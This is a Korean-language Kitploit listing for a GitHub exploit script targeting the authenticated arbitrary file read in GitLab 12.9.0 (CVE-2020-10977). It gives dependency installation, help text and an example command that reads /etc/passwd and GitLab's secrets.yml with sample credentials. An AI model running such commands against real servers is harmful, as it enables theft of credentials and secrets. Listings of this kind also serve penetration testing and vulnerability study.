Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
gitlab-12.9.0-file-read — GitLab v12.9.0 (CVE-2020-10977)의 인증된 임의 파일 읽기에 관해 exploit-db에서 찾을 수 있는 스크립트보다 더 나은 (되기를 원하는) 스크립트 | Kitploit
도구/GitHubGitHub/erk3/gitlab-12.9.0-file-read
Vulnerability AnalysisExploitationWeb Application ExploitationInformation GatheringPenetration Testing
GitHuberk3/gitlab-12.9.0-file-read

gitlab-12.9.0-file-read

GitLab v12.9.0 (CVE-2020-10977)의 인증된 임의 파일 읽기에 관해 exploit-db에서 찾을 수 있는 스크립트보다 더 나은 (되기를 원하는) 스크립트

저장소 보기
5년 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

경고

데모 목적 및 윤리적 해킹 전용입니다.

설명

GitLab v12.9.0 (CVE-2020-10977)의 인증된 임의 파일 읽기에 대해 exploit-db에서 찾을 수 있는 것보다 (되도록) 더 나은 스크립트

사용 방법

  1. 의존성 확인 (나머지는 이미 있을 것입니다)

pip3 install requests python-gitlab

  1. 자격 증명을 사용하여 API 토큰 받기

https://docs.gitlab.com/ee/user/profile/personal_access_tokens.html

  1. 실행?
root@kitploit:~
$ python3 gitlab-12.9.0-lfi.py -h
usage: gitlab-12.9.0-lfi.py [-h] -H HOST -u USER -p PASSWD -t TOKEN -f FILES

optional arguments:
  -h, --help            show this help message and exit
  -H HOST, --host HOST  The https URI to gitlab webroot
  -u USER, --user USER  The user name
  -p PASSWD, --passwd PASSWD
                        The user password
  -t TOKEN, --token TOKEN
                        The access token
  -f FILES, --files FILES
                        The absolute paths to the files on the Gitlab local system
root@kitploit:~
$ python3 gitlab-12.9.0-file-read.py -H https://gitlab.domain.com/ -u erk3 -p test1234 -t 9nsDFXshb1txxkkZAv24 -f /etc/passwd -f /etc/hosts -f /opt/gitlab/embedded/service/gitlab-rails/config/secrets.yml
도구 다운로드